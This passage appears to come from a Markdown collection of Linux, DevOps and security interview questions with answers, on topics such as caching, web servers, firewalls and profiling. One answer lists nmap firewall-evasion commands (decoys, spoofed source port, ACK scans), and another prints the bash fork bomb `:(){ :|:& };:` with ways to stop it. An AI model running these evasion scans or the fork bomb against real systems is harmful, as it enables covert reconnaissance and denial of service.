- [/dev/tcp as a weapon](https://securityreliks.wordpress.com/2010/08/20/devtcp-as-a-weapon/)
- [Test from shell script if remote TCP port is open](https://stackoverflow.com/questions/4922943/test-from-shell-script-if-remote-tcp-port-is-open)

</details>

<details>
<summary><b>How do I measure request and response times at once using <code>curl</code>?</b></summary><br>

`curl` supports formatted output for the details of the request (see the `curl` manpage for details, under `-w, --write-out <format>`). For our purposes we'll focus just on the timing details that are provided.
1. Create a new file, `curl-format.txt`, and paste in:

```bash
    time_namelookup:  %{time_namelookup}\n
       time_connect:  %{time_connect}\n
    time_appconnect:  %{time_appconnect}\n
   time_pretransfer:  %{time_pretransfer}\n
      time_redirect:  %{time_redirect}\n
 time_starttransfer:  %{time_starttransfer}\n
                    ----------\n
         time_total:  %{time_total}\n
```

2. Make a request:

```bash
curl -w "@curl-format.txt" -o /dev/null -s "http://example.com/"
```

What this does:

- `-w "@curl-format.txt"` - tells cURL to use our format file
- `-o /dev/null` - redirects the output of the request to /dev/null
- `-s` - tells cURL not to show a progress meter

`http://example.com/` is the URL we are requesting. Use quotes, particularly if your URL has "&" query string parameters.

</details>

<details>
<summary><b>You need to move the ext4 journal to another disk/partition. What are the reasons for this? ***</b></summary><br>

To be completed.

Useful resources:

- [ext4: using external journal to optimize performance](https://raid6.com.au/posts/fs_ext4_external_journal/)
- [How to move an ext4 journal](https://unix.stackexchange.com/questions/278998/how-to-move-an-ext4-journal)

</details>

<details>
<summary><b>Does having Varnish in front of your website/app mean you don't need to care about load balancing or redundancy?</b></summary><br>

It depends. Varnish is a cache server, so its purpose is to cache contents and to act as a reverse proxy, to speed up retrieval of data and to lessen the load on the webserver.

Varnish can also be configured as a load-balancer for multiple web servers, but if we use just one Varnish server, it will become the single point of failure in our infrastructure. A better solution to ensure load-balancing and redundancy would be a cluster of at least two Varnish instances, in active-active or active-passive mode.

</details>

<details>
<summary><b>What are hits, misses, and hit-for-pass in Varnish Cache?</b></summary><br>

A **hit** is a request which is successfully served from the cache. A **miss** is a request that goes through the cache but finds an empty cache and therefore has to be fetched from the origin. A **hit-for-pass** comes in when Varnish Cache realizes that one of the objects it has requested is uncacheable and will result in a pass.

Useful resources:

- [VCL rules for hits](https://book.varnish-software.com/4.0/chapters/VCL_Subroutines.html#vcl-vcl-hit)
- [VCL rules for hit-for-pass](https://book.varnish-software.com/4.0/chapters/VCL_Subroutines.html#hit-for-pass)
- [Example of the use](https://book.varnish-software.com/4.0/chapters/VCL_Basics.html#vcl-backend-response)

</details>

<details>
<summary><b>What is a reasonable TTL for cached content given the following parameters? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Developer says: <i><code>htaccess</code> is full of magic and it should be used</i>. What is your opinion about using <code>htaccess</code> files? What effect does this have on the web app?</b></summary><br>

`.htaccess` files were born out of an era when shared hosting was commonplace: sysadmins needed a way to allow multiple clients to access their server under different accounts, with different configurations for their websites. The `.htaccess` file allowed them to modify how Apache works without having access to the entire server.

These files can reside in any and every directory in the directory tree of the website and provide features to the directory and the files and folders inside it.
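Whether Apache consults them at all is controlled from the main configuration via the `AllowOverride` directive - a minimal sketch (the directory path is just an example):

```bash
# httpd.conf / vhost excerpt
<Directory "/var/www/example">
    # "None" makes Apache skip .htaccess lookups under this tree entirely;
    # shared hosters typically set "All" (or a list of directive groups) instead
    AllowOverride None
</Directory>
```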
**It's horrible for performance**

For `.htaccess` to work, Apache needs to check EVERY directory in the requested path for the existence of a `.htaccess` file, and if it exists it reads EVERY one of them and parses it. This happens for EVERY request. Remember that the second you change that file, it's effective. This is because Apache reads it every time.

Every single request the webserver handles - even for the lowliest `.png` or `.css` file - causes Apache to:

- look for a `.htaccess` file in the directory of the current request
- then look for a `.htaccess` file in every directory from there up to the server root
- coalesce all of these `.htaccess` files together
- reconfigure the webserver using the new settings
- finally, deliver the file

Every webpage can generate dozens of requests. This is overhead you don't need, and what's more, it's completely unnecessary.

**Security and permission loss**

Allowing individual users to modify the configuration of a server using `.htaccess` can cause security concerns if not taken care of properly. Any directive added to a `.htaccess` file is treated as if it were added to Apache's configuration file. This means it may be possible for non-admins to write these files and thus 'undo' all of your security.

If you need to do something that is temporary, `.htaccess` is a good place to do it; if you need to do something more permanent, just put it in your `/etc/apache/sites-available/site.conf` (or `httpd.conf` or whatever your server calls it).

**Summary**

You should avoid using `.htaccess` files completely if you have access to the httpd main server config file. If it worked in `.htaccess`, it will work in your virtual host `.conf` file as well. If you cannot avoid using `.htaccess` files, you should follow these rules:

- use only one `.htaccess` file or as few as possible
- place the `.htaccess` file in the site root directory
- keep your `.htaccess` file short and simple

Useful resources:

- [Like Apache: .htaccess](https://www.nginx.com/resources/wiki/start/topics/examples/likeapache-htaccess/)
- [Don't Use .htaccess Unless You Must](https://www.danielmorell.com/guides/htaccess-seo/basics/dont-use-htaccess-unless-you-must)

</details>

<details>
<summary><b>Is it safe to use SNI SSL in production? How to test the connection with and without it? In which cases is it useful?</b></summary><br>

With <b>OpenSSL</b>:

```bash
# Testing connection to remote host (with SNI support)
echo | openssl s_client -showcerts -servername google.com -connect google.com:443

# Testing connection to remote host (without SNI support)
echo | openssl s_client -connect google.com:443 -showcerts
```

With <b>GnuTLS</b>:

```bash
# Testing connection to remote host (with SNI support)
gnutls-cli -p 443 google.com

# Testing connection to remote host (without SNI support)
gnutls-cli --disable-sni -p 443 google.com
```

</details>

<details>
<summary><b>How are cookies passed in the HTTP protocol?</b></summary><br>

The server sends the following in its response header to set a cookie field: `Set-Cookie:name=value`.

If there is a cookie set, then the browser sends the following in its request header: `Cookie:name=value`.

</details>

<details>
<summary><b>How to prevent a web server from processing requests with undefined server names? Can a missing default server name rule be a security issue? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>You need to rewrite POST requests with their payload to an external API, but the POST requests lose the parameters passed in the URL.
How to fix this problem (e.g. in Nginx) and what are the reasons for this behavior?</b></summary><br>

The issue is that external redirects will never resend **POST** data. This is written into the HTTP spec (check the `3xx` section). Any client that does resend it is violating the spec.

**POST** data is passed in the body of the request, which gets dropped if you do a standard redirect. Look at this:

```
+-------------------------------------------+-----------+-----------+
|                                           | Permanent | Temporary |
+-------------------------------------------+-----------+-----------+
| Allows changing the request method from   | 301       | 302       |
| POST to GET                               |           |           |
| Does not allow changing the request       | 308       | 307       |
| method from POST to GET                   |           |           |
+-------------------------------------------+-----------+-----------+
```

You can try the HTTP status code **307**; an RFC-compliant browser should repeat the POST request. You just need to write an Nginx rewrite rule with HTTP status code **307** or **308**:

```bash
location / {
  proxy_pass http://localhost:80;
  client_max_body_size 10m;
}

location /api {
  # HTTP 307 only for POST method.
  if ($request_method = POST) {
    return 307 https://api.example.com$request_uri;
  }

  # You can keep this for non-POST requests.
  rewrite ^ https://api.example.com$request_uri permanent;

  client_max_body_size 10m;
}
```

HTTP status code **307** or **308** should be used instead of **301**, because **301** allows the request method to change from **POST** to **GET**.

Useful resources:

- [Redirection on Apache (Maintain POST params)](https://stackoverflow.com/questions/17295085/redirection-on-apache-maintain-post-params)
- [Why doesn't HTTP have POST redirect?](https://softwareengineering.stackexchange.com/questions/99894/why-doesnt-http-have-post-redirect)

</details>

<details>
<summary><b>What is the proper way to test NFS performance? Prepare a short checklist.</b></summary><br>

The best benchmark is always "the application(s) that you normally use". The load on an NFS system when you have 20 people simultaneously compiling a Linux kernel is completely different from a bunch of people logging in at the same time, or the accounts used as "home directories for the local web-server".

But we have some good tools for testing this:

- <b>bonnie</b> - a classical performance evaluation tool. The main program tests database-type access to a single file (or a set of files if you wish to test more than 1G of storage), and it tests creation, reading, and deleting of small files which can simulate the usage of programs such as Squid, INN, or Maildir-format email.
- <b>DBench</b> - was written to allow independent developers to debug and test SAMBA. It is heavily inspired by the original SAMBA tool.
- <b>IOZone</b> - a performance test suite, POSIX and 64-bit compliant. This is the filesystem test from the L.S.E. Main features: POSIX async I/O, mmap() file I/O, normal file I/O, single stream measurement, multiple stream measurement, distributed file server measurements (cluster), POSIX pthreads, multi-process measurement, selectable measurements with fsync, O_SYNC, latency plots.

</details>

<details>
<summary><b>You need to block several IPs from the same subnet. Which is more efficient for the system - traversing the iptables rule set or a black-hole route?</b></summary><br>

If you have a system with thousands of routes defined in the routing table and nothing in the iptables rules, then it might actually be more efficient to input an iptables rule.
In most systems, however, the routing table is fairly small; in cases like this it is actually more efficient to use null routes. This is especially true if you already have extensive iptables rules in place.

Assuming you're blocking based on source address and not destination, doing the **DROP** in **raw/PREROUTING** would work well, as you would essentially be able to drop the packet before any routing decision is made. Remember, however, that iptables rules are essentially a linked list, and for optimum performance when blocking a number of addresses you should use an `ipset`.

On the other hand, if blocking by destination, there is likely little difference between blocking at the routing table vs. iptables, **EXCEPT** if source IPs are spoofed, in which case the blackholed entries may consume routing cache resources; in this case, **raw/PREROUTING** remains preferable.

Your outgoing route isn't going to matter until you try to send a packet back to the attacker. By that time you will have already incurred most of the cost of socket setup, and you may even have a thread blocking while waiting for the kernel to conclude you have no route to host, plus whatever error handling your server process does when it concludes there's a network problem. iptables or another firewall will allow you to block the incoming traffic and discard it before it reaches the daemon process on your server. It seems clearly superior in this use case.

```bash
iptables -A INPUT -s 192.168.200.0/24 -j DROP
```

When you define a route on a Linux/Unix system, it tells the system that in order to communicate with the specified IP address, the network communication needs to be routed to this specific place. When you define a null route, it simply tells the system to drop the network communication that is destined for the specified IP address. This means that any TCP-based network communication will not be able to be established, as your server will no longer send a SYN/ACK reply. Any UDP-based network communication will still be received; however, your system will no longer send any response to the originating IP.

While iptables can accept tens of thousands of rules in a chain, the chains are walked sequentially, for every packet, until a match is found. So lots of rules can lead to the system spending amazing amounts of CPU time walking through the rules.

The routing rules are much simpler than iptables. With iptables, a match can be based on many different variables, including protocols, source and destination addresses and ports, and even other packets that were sent before the current packet. In routing, all that matters is the remote IP address, so it's very easy to optimize. Also, many systems have a lot of routing rules. A typical system may only have 5 or 10, but something that's acting as a BGP router can have tens of thousands. So, for a very long time there have been extensive optimizations in selecting the right route for a particular packet.

In less technical terms, this means your system will receive data from the attackers but no longer respond to it.
```bash
ip route add blackhole 192.168.200.0/24
```

or

```bash
ip route add 192.168.200.0/24 via 127.0.0.1
```

Useful resources:

- [The difference between iptables DROP and null-routing.](https://www.tummy.com/blogs/2006/07/27/the-difference-between-iptables-drop-and-null-routing/)

</details>

<details>
<summary><b>How to run <code>scp</code> with a second remote host?</b></summary><br>

With `ssh`:

```bash
ssh user1@remote1 'ssh user2@remote2 "cat file"' > file
```

With `tar` (with compression):

```bash
ssh user1@remote1 'ssh user2@remote2 "cd path2; tar cj file"' | tar xj
```

With `ssh` and a port forwarding tunnel:

```bash
# First, open the tunnel
ssh -L 1234:remote2:22 -p 45678 user1@remote1

# Then, use the tunnel to copy the file directly from remote2
scp -P 1234 user2@localhost:file .
```

</details>

<details>
<summary><b>How can you reduce the load time of a dynamic website?</b></summary><br>

- webpage optimization
- cached web pages
- quality web hosting
- compressed text files
- apache/nginx tuning

</details>

<details>
<summary><b>What types of DNS cache are involved when you type api.example.com in your browser and press return?</b></summary><br>

The browser checks if the domain is in its cache (to see the DNS cache in Chrome, go to `chrome://net-internals/#dns`). If this cache fails, it simply asks the OS to resolve the domain.

The OS resolver has its own cache, which it will check. If this fails too, it resorts to asking the OS-configured DNS servers. These will typically have been configured by DHCP from the router, where the DNS servers are likely to be the ISP's DNS servers, configured by DHCP from the internet gateway to the router.

In the event the router has its own DNS servers, it may have its own cache; otherwise you will be directed straight to your ISP's DNS servers as soon as the OS cache is found to be empty.

Useful resources:

- [What happens when...](https://github.com/alex/what-happens-when)
- [DNS Explained - How Your Browser Finds Websites](https://scotch.io/tutorials/dns-explained-how-your-browser-finds-websites)
- [Firefox invalidate dns cache](https://stackoverflow.com/questions/13063496/firefox-invalidate-dns-cache)

</details>

<details>
<summary><b>What is the difference between <code>Cache-Control: max-age=0</code> and <code>Cache-Control: no-cache</code>?</b></summary><br>

**When sent by the origin server**

`max-age=0` simply tells caches (and user agents) the response is stale from the get-go, and so they SHOULD revalidate the response (e.g. with the `If-None-Match` or `If-Modified-Since` headers) before using a cached copy, whereas `no-cache` tells them they MUST revalidate before using a cached copy.

In other words, caches may sometimes choose to use a stale response (although I believe they have to then add a Warning header), but `no-cache` says they're not allowed to use a stale response no matter what. Maybe you'd want the SHOULD-revalidate behavior when baseball stats are generated in a page, but you'd want the MUST-revalidate behavior when you've generated the response to an e-commerce purchase.

**When sent by the user agent**

If a user agent sends a request with `Cache-Control: max-age=0` (aka. "end-to-end revalidation"), then each cache along the way will revalidate its cache entry (e.g. with the `If-None-Match` header) all the way to the origin server. If the reply is then 304 (Not Modified), the cached entity can be used. On the other hand, sending a request with `Cache-Control: no-cache` (aka.
"end-to-end reload") doesn't revalidate and the server MUST NOT use a cached copy when responding. </details> <details> <summary><b>What are the security risks of setting <code>Access-Control-Allow-Origin</code>?</b></summary><br> By responding with <code>Access-Control-Allow-Origin: *</code>, the requested resource allows sharing with every origin. This basically means that any site can send an XHR request to your site and access the server’s response which would not be the case if you hadn’t implemented this CORS response. So any site can make a request to your site on behalf of their visitors and process its response. If you have something implemented like an authentication or authorization scheme that is based on something that is automatically provided by the browser (cookies, cookie-based sessions, etc.), the requests triggered by the third party sites will use them too. </details> <details> <summary><b>Create a single-use TCP or UDP proxy with <code>netcat</code>.</b></summary><br> ```bash ### TCP -> TCP nc -l -p 2000 -c "nc [ip|hostname] 3000" ### TCP -> UDP nc -l -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> UDP nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> TCP nc -l -u -p 2000 -c "nc [ip|hostname] 3000" ``` </details> <details> <summary><b>Explain 3 techniques for avoiding firewalls with <code>nmap</code>.</b></summary><br> **Use Decoy addresses** ```bash # Generates a random number of decoys. nmap -D RND:10 [target] # Manually specify the IP addresses of the decoys. nmap -D decoy1,decoy2,decoy3 ``` In this type of scan you can instruct Nmap to spoof packets from other hosts.In the firewall logs it will be not only our IP address but also and the IP addresses of the decoys so it will be much harder to determine from which system the scan started. **Source port number specification** ```bash nmap --source-port 53 [target] ``` A common error that many administrators are doing when configuring firewalls is to set up a rule to allow all incoming traffic that comes from a specific port number.The <code>--source-port</code> option of Nmap can be used to exploit this misconfiguration.Common ports that you can use for this type of scan are: 20, 53 and 67. **Append Random Data** ```bash nmap --data-length 25 [target] ``` Many firewalls are inspecting packets by looking at their size in order to identify a potential port scan.This is because many scanners are sending packets that have specific size.In order to avoid that kind of detection you can use the command <code>--data-length</code> to add additional data and to send packets with different size than the default. **TCP ACK Scan** ```bash nmap -sA [target] ``` It is always good to send the ACK packets rather than the SYN packets because if there is any active firewall working on the remote computer then because of the ACK packets the firewall cannot create the log, since firewalls treat ACK packet as the response of the SYN packet. Useful resources: - [Nmap - Techniques for Avoiding Firewalls](https://pentestlab.blog/2012/04/02/nmap-techniques-for-avoiding-firewalls/) </details> ###### Devops Questions (5) <details> <summary><b>Explain how Flap Detection works in Nagios?</b></summary><br> **Flapping** occurs when a service or host changes state too frequently, this causes lot of problem and recovery notifications. Once you have defined **Flapping**, explain how Nagios detects **Flapping**. Whenever Nagios checks the status of a host or service, it will check to see if it has started or stopped flapping. 
Nagios follows the procedure below to do that:

- storing the results of the last 21 checks of the host or service
- analyzing the historical check results and determining where state changes/transitions occur
- using the state transitions to determine a percent state change value (a measure of change) for the host or service
- comparing the percent state change value against low and high flapping thresholds

</details>

<details>
<summary><b>What are the advantages that Containerization provides over Virtualization?</b></summary><br>

Below are the advantages of containerization over virtualization:

- containers provide real-time provisioning and scalability, but VMs provide slow provisioning
- containers are lightweight when compared to VMs
- VMs have limited performance when compared to containers
- containers have better resource utilization compared to VMs

</details>

<details>
<summary><b>Is the way of distributing Docker apps (e.g. Apache, MySQL) from Docker Hub good for production environments? Describe security problems and possible solutions. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Some of the common use cases of LXC and LXD come from the following requirements... Explain.</b></summary><br>

- the need for an isolated development environment without polluting your host machine
- isolation within production servers and the possibility to run more than one service in its own container
- a need to test things with more than one version of the same software or different operating system environments
- experimenting with different and new releases of GNU/Linux distributions without having to install them on a physical host machine
- trying out a software or development stack that may or may not be used after some playing around
- installing many types of software in your primary development machine or production server and maintaining them on a longer run
- doing a dry run of any installation or maintenance task before actually executing it on production machines
- better utilization and provisioning of server resources with multiple services running for different users or clients
- high-density virtual private server (VPS) hosting, where isolation without the cost of full virtualization is needed
- easy access to host hardware from a container, compared to complicated access methods from virtual machines
- multiple build environments with different customizations in place

</details>

<details>
<summary><b>You have to prepare a Redis cluster. How will you ensure security?</b></summary><br>

- protect a given Redis instance from outside accesses via firewall
- bind it to 127.0.0.1 if only local clients are accessing it
- use a sandboxed environment
- enable **AUTH**
- enable **Protected Mode**
- add data encryption support (e.g. `spiped`)
- disable specific commands
- use user **ACLs**

Useful resources:

- [Redis Security](https://redis.io/topics/security)
- [A few things about Redis security](http://antirez.com/news/96)

</details>

###### Cyber Security Questions (5)

<details>
<summary><b>What is OWASP Application Security Verification Standard? Explain in a few points. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What is CSRF?</b></summary><br>

**Cross-Site Request Forgery** is a web application vulnerability in which the server does not check whether the request came from a trusted client or not; the request is just processed directly. The answer can be further followed by ways to detect this, examples and countermeasures.
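As a hedged illustration (the URLs, cookie and parameter names are hypothetical): the forgery works because the victim's browser attaches its session cookie to cross-site requests automatically, so a page on the attacker's site can trigger the equivalent of:

```bash
# What the victim's browser effectively sends on the attacker's behalf
curl 'https://bank.example/transfer' \
     -H 'Cookie: session=VICTIM_SESSION_ID' \
     -d 'to=attacker&amount=1000'

# Common countermeasure: additionally require a per-session anti-CSRF token
# in the request body (e.g. -d 'csrf_token=...') - a value that pages served
# from other origins cannot read, so the forged request fails the check.
```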
</details>

<details>
<summary><b>What is the difference between policies, processes and guidelines?</b></summary><br>

A **security policy** defines the security objectives and the security framework of an organisation. A **process** is a detailed step-by-step how-to document that specifies the exact actions necessary to implement an important security mechanism. **Guidelines** are recommendations which can be customized and used in the creation of procedures.

</details>

<details>
<summary><b>What is a false positive and false negative in case of IDS?</b></summary><br>

When the device generates an alert for an intrusion which has actually not happened, this is a **false positive**, and if the device has not generated any alert and the intrusion has actually happened, this is the case of a **false negative**.

</details>

<details>
<summary><b>10 quick points about web server hardening.</b></summary><br>

Example:

- if the machine is a new install, protect it from hostile network traffic until the operating system is installed and hardened
- create a separate partition with the `nodev`, `nosuid`, and `noexec` options set for `/tmp`
- create separate partitions for `/var`, `/var/log`, `/var/log/audit`, and `/home`
- enable randomized virtual memory region placement
- remove legacy services (e.g. `telnet-server`, `rsh`, `rlogin`, `rcp`, `ypserv`, `ypbind`, `tftp`, `tftp-server`, `talk`, `talk-server`)
- limit connections to services running on the host to authorized users of the service via firewalls and other access control technologies
- disable source routed packet acceptance
- enable **TCP/SYN** cookies
- disable SSH root login
- install and configure **AIDE**
- install and configure **OSSEC HIDS**
- configure **SELinux**
- all administrator or root access must be logged
- integrity checking of system accounts, group memberships, and their associated privileges should be enabled and tested
- set password creation requirements (e.g. with PAM)

Useful resources:

- [Security Harden CentOS 7](https://highon.coffee/blog/security-harden-centos-7/)
- [CentOS 7 Server Hardening Guide](https://www.lisenet.com/2017/centos-7-server-hardening-guide/)

</details>

## <a name="secret-knowledge">Secret Knowledge</a>

### :diamond_shape_with_a_dot_inside: <a name="guru-sysadmin">Guru Sysadmin</a>

<details>
<summary><b>Explain what is Event-Driven architecture and how it improves performance? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>An application encounters some performance issues. You need to find the code to optimize. How to profile an app in a Linux environment?</b></summary><br>

> Ideally, I need an app that will attach to a process and log periodic snapshots of: memory usage, number of threads, CPU usage.

1. You can use `top` in batch mode. It runs in batch mode either until it is killed or until N iterations are done:

```bash
top -b -p `pidof a.out`
```

or

```bash
top -b -p `pidof a.out` -n 100
```

2. You can use `ps` (for instance in a shell script):

```bash
ps --format pid,pcpu,cputime,etime,size,vsz,cmd -p `pidof a.out`
```

> I need some means of recording the performance of an application on a Linux machine.
1. To record performance data:

```bash
perf record -p `pidof a.out`
```

or to record for 10 secs:

```bash
perf record -p `pidof a.out` sleep 10
```

or to record with the call graph (`-g`):

```bash
perf record -g -p `pidof a.out`
```

2. To analyze the recorded data:

```bash
perf report --stdio
perf report --stdio --sort=dso -g none
perf report --stdio -g none
perf report --stdio -g
```

**This is an example of profiling a test program**

1. I run my test program (c++):

```bash
./my_test 100000000
```

2. Then I record performance data of a running process:

```bash
perf record -g -p `pidof my_test` -o ./my_test.perf.data sleep 30
```

3. Then I analyze load per module:

```bash
perf report --stdio -g none --sort comm,dso -i ./my_test.perf.data

# Overhead  Command                 Shared Object
# ........  .......  ............................
#   70.06%  my_test  my_test
#   28.33%  my_test  libtcmalloc_minimal.so.0.1.0
#    1.61%  my_test  [kernel.kallsyms]
```

4. Then load per function is analyzed:

```bash
perf report --stdio -g none -i ./my_test.perf.data | c++filt

# Overhead  Command                 Shared Object                        Symbol
# ........  .......  ............................  ...........................
#   29.30%  my_test  my_test                       [.] f2(long)
#   29.14%  my_test  my_test                       [.] f1(long)
#   15.17%  my_test  libtcmalloc_minimal.so.0.1.0  [.] operator new(unsigned long)
#   13.16%  my_test  libtcmalloc_minimal.so.0.1.0  [.] operator delete(void*)
#    9.44%  my_test  my_test                       [.] process_request(long)
#    1.01%  my_test  my_test                       [.] operator delete(void*)@plt
#    0.97%  my_test  my_test                       [.] operator new(unsigned long)@plt
#    0.20%  my_test  my_test                       [.] main
#    0.19%  my_test  [kernel.kallsyms]             [k] apic_timer_interrupt
#    0.16%  my_test  [kernel.kallsyms]             [k] _spin_lock
#    0.13%  my_test  [kernel.kallsyms]             [k] native_write_msr_safe
# ...
```

5. Then call chains are analyzed:

```bash
perf report --stdio -g graph -i ./my_test.perf.data | c++filt

# Overhead  Command                 Shared Object                        Symbol
# ........  .......  ............................  ...........................
#   29.30%  my_test  my_test                       [.] f2(long)
#            |
#            --- f2(long)
#               |
#                --29.01%-- process_request(long)
#                          main
#                          __libc_start_main
#
#   29.14%  my_test  my_test                       [.] f1(long)
#            |
#            --- f1(long)
#               |
#               |--15.05%-- process_request(long)
#               |          main
#               |          __libc_start_main
#               |
#                --13.79%-- f2(long)
#                          process_request(long)
#                          main
#                          __libc_start_main
# ...
```

So at this point you know where your program spends time.

A simple way to profile an app is also to use the `pstack` utility or `lsstack`.

Another tool is Valgrind, so this is what I recommend. Run the program first:

```bash
valgrind --tool=callgrind --dump-instr=yes -v --instr-atstart=no ./binary > tmp
```

Now, when it works and we want to start profiling, we should run in another window:

```bash
callgrind_control -i on
```

This turns profiling on. To turn it off and stop the whole task we might use:

```bash
callgrind_control -k
```

Now we have some files named callgrind.out.* in the current directory. To see the profiling results use:

```bash
kcachegrind callgrind.out.*
```

I recommend clicking on the **Self** column header in the next window; otherwise it shows that `main()` is the most time-consuming task.

Useful resources:

- [Tracing processes for fun and profit](http://techblog.rosedu.org/tracing-processes-for-fun-and-profit.html)

</details>

<details>
<summary><b>You are using a Linux system with a limited number of packages installed, and telnet is not available.
Use the sysfs virtual filesystem to test the link state of all interfaces (without loopback).</b></summary><br>

For example:

```bash
#!/usr/bin/env bash

state=0
for iface in $(ls /sys/class/net/ | grep -v lo) ; do
  if [[ $(cat /sys/class/net/$iface/carrier 2>/dev/null) = 1 ]] ; then state=1 ; fi
done

if [[ $state -eq 0 ]] ; then
  echo "no connection" >&2
  exit 1
fi
```

</details>

<details>
<summary><b>Write two golden rules for reducing the impact of a hacked system.</b></summary><br>

1) **The principle of least privilege**

You should configure services to run as a user with the least possible rights necessary to complete the service's tasks. This can contain a hacker even after they break into a machine.

As an example, a hacker breaking into a system using a zero-day exploit of the Apache webserver service is highly likely to be limited to just the system memory and file resources that can be accessed by that process. The hacker would be able to download your html and php source files, and probably look into your mysql database, but they should not be able to get root or extend their intrusion beyond apache-accessible files. Many Apache webserver installations create the 'apache' user and group by default, and you can easily configure the main Apache configuration file (`httpd.conf`) to run apache using them.

2) **The principle of separation of privileges**

If your web site only needs read-only access to the database, then create an account that only has read-only permissions, and only to that database.

**SELinux** is a good choice for creating security contexts, **AppArmor** is another tool. **Bastille** was a previous choice for hardening. Reduce the consequences of any attack by separating the power of the compromised service into its own "box".

3) **Whitelist, don't blacklist**

You're describing a blacklist approach. A whitelist approach would be much safer. An exclusive club will never try to list everyone who can't come in; they will list everyone who can come in and exclude those not on the list. Similarly, trying to list everything that shouldn't access a machine is doomed. Restricting access to a short list of programs/IP addresses/users would be more effective.

Of course, like anything else, this involves some trade-offs. Specifically, a whitelist is massively inconvenient and requires constant maintenance. To go even further in the tradeoff, you can get great security by disconnecting the machine from the network.

**Also interesting are**:

Use the tools available. It's highly unlikely that you can do as well as the guys who are security experts, so use their talents to protect yourself.

- public key encryption provides excellent security
- enforce password complexity
- understand why you are making exceptions to the rules above
- review your exceptions regularly
- hold someone to account for failure, it keeps you on your toes

Useful resources:

- [How to prevent zero day attacks (original)](https://serverfault.com/questions/391370/how-to-prevent-zero-day-attacks)

</details>

<details>
<summary><b>You're at a security conference. Attendees are debating putting an OpenBSD firewall at the core of the network. Go to the podium and express your opinion about this solution. What are the pros/cons and why? ***</b></summary><br>

To be completed. Some points such an opinion could weigh: on the pro side, PF's clear and auditable rule syntax, OpenBSD's security track record, and built-in redundancy via CARP and pfsync; on the con side, raw throughput on commodity hardware versus dedicated appliances at the network core, a smaller pool of operational expertise, and the lack of a commercial support contract that some organizations require.
</details>

<details>
<summary><b>Is there a way to allow multiple cross-domains using the Access-Control-Allow-Origin header in Nginx?</b></summary><br>

To match a list of domains and subdomains, this regex makes it easy to work with fonts:

```bash
location ~* \.(?:ttf|ttc|otf|eot|woff|woff2)$ {
  if ( $http_origin ~* (https?://(.+\.)?(domain1|domain2|domain3)\.(?:me|co|com)$) ) {
    add_header "Access-Control-Allow-Origin" "$http_origin";
  }
}
```

A slightly more elaborate configuration:

```bash
location / {
  if ($http_origin ~* (^https?://([^/]+\.)*(domainone|domaintwo)\.com$)) {
    set $cors "true";
  }

  # Nginx doesn't support nested If statements. This is where things get slightly nasty.
  # Determine the HTTP request method used
  if ($request_method = 'GET') {
    set $cors "${cors}get";
  }
  if ($request_method = 'POST') {
    set $cors "${cors}post";
  }

  if ($cors = "true") {
    # Catch all in case there's a request method we're not dealing with properly
    add_header 'Access-Control-Allow-Origin' "$http_origin";
  }

  if ($cors = "trueget") {
    add_header 'Access-Control-Allow-Origin' "$http_origin";
    add_header 'Access-Control-Allow-Credentials' 'true';
    add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS';
    add_header 'Access-Control-Allow-Headers' 'DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type';
  }

  if ($cors = "truepost") {
    add_header 'Access-Control-Allow-Origin' "$http_origin";
    add_header 'Access-Control-Allow-Credentials' 'true';
    add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS';
    add_header 'Access-Control-Allow-Headers' 'DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type';
  }
}
```

</details>

<details>
<summary><b>Explain <code>:(){ :|:& };:</code> and how to stop this code if you are already logged into a system?</b></summary><br>

It's a **fork bomb**.

- `:()` - defines the function. `:` is the function name and the empty parentheses show that it will not accept any arguments
- `{ }` - these characters show the beginning and end of the function definition
- `:|:` - loads a copy of the function `:` into memory and pipes its output to another copy of the `:` function, which also has to be loaded into memory
- `&` - makes the process a background process, so that the child processes will not get killed even though the parent gets auto-killed
- `:` - the final `:` executes the function again and hence the chain reaction begins

The best way to protect a multi-user system is to use **PAM** to limit the number of processes a user can use. We know the biggest problem with a fork bomb is the fact it takes up so many processes. So we have two ways of attempting to fix this, if you are already logged into the system:

- send a **SIGSTOP** signal to stop the processes: `killall -STOP -u user1`
- if you can't run this at the command line you will have to use `exec` to force it to run (due to all processes being used): `exec killall -STOP -u user1`

With fork bombs your best method is preventing them from becoming too big of an issue in the first place.

</details>

<details>
<summary><b>How to recover a deleted file held open e.g. by Apache?</b></summary><br>

If a file has been deleted but is still open, that means the file still exists in the filesystem (it has an inode) but has a hard link count of 0. Since there is no link to the file, you cannot open it by name. There is no facility to open a file by inode either.

Linux exposes open files through special symbolic links under `/proc`.
These links are called `/proc/12345/fd/42`, where 12345 is the **PID** of a process and 42 is the number of a file descriptor in that process. A program running as the same user as that process can access the file (the read/write/execute permissions are the same as you had when the file was deleted). The name under which the file was opened is still visible in the target of the symbolic link: if the file was `/var/log/apache/foo.log`, then the target of the link is `/var/log/apache/foo.log (deleted)`.

Thus you can recover the content of an open deleted file given the **PID** of a process that has it open and the descriptor that it's opened on like this:

```bash
recover_open_deleted_file () {
  old_name=$(readlink "$1")
  case "$old_name" in
    *' (deleted)')
      old_name=${old_name%' (deleted)'}
      if [ -e "$old_name" ]; then
        new_name=$(TMPDIR=${old_name%/*} mktemp)
        echo "$old_name has been replaced, recovering content to $new_name"
      else
        new_name="$old_name"
      fi
      cat <"$1" >"$new_name";;
    *) echo "File is not deleted, doing nothing";;
  esac
}
recover_open_deleted_file "/proc/$pid/fd/$fd"
```

If you only know the process **ID** but not the descriptor, you can recover all files with:

```bash
for x in /proc/$pid/fd/* ; do
  recover_open_deleted_file "$x"
done
```

If you don't know the process **ID** either, you can search among all processes:

```bash
for x in /proc/[1-9]*/fd/* ; do
  case $(readlink "$x") in
    /var/log/apache/*)
      recover_open_deleted_file "$x";;
  esac
done
```

You can also obtain this list by parsing the output of `lsof`, but it isn't simpler, more reliable or more portable (this is Linux-specific anyhow).

</details>

<details>
